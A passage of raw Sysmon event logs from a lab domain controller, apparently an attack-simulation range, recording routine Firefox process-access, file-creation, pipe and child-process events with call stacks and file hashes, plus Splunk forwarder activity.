Files\Mozilla Firefox\xul.dll+a04e9a|C:\Program Files\Mozilla Firefox\xul.dll+a03065|C:\Program Files\Mozilla Firefox\xul.dll+a0a25e|C:\Program Files\Mozilla Firefox\xul.dll+8b1df0|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+2680a|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105041Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.139{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5552.2.1156478300\1171434838" -childID 2 -isForBrowser -prefsHandle 1580 -prefMapHandle 1536 -prefsLen 1732 -prefMapSize 235910 -jsInit 1076 285716 -parentBuildID 20210922161155 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 2692 2b092f55938 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92LowMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 23542300x8000000000000000105040Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.120{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-journalMD5=392E84B0E8D7107B4C1C9123D2C25545,SHA256=1C67CE7AE110B351891040D24BBFF74CF9C1A2DDBA3458ECFB4291D8A5526995,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000105039Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.120{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.2.115647830C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105038Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.120{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5543CD0E8A942C9EB2EE2ED838E9A4AA,SHA256=0B1885B28621E68198BFC43402B63565C1AE01AB32B53F69C3BA2B19E2BF8FBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105037Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.120{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105036Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105035Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+fe1f1e|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04 10341000x8000000000000000105034Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105033Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105032Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105031Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+fe1f1e|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04 10341000x8000000000000000105030Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105029Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105028Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.073{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105027Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e57449|C:\Program Files\Mozilla Firefox\xul.dll+e49022|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7 10341000x8000000000000000105026Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105025Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105024Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105023Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105022Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program 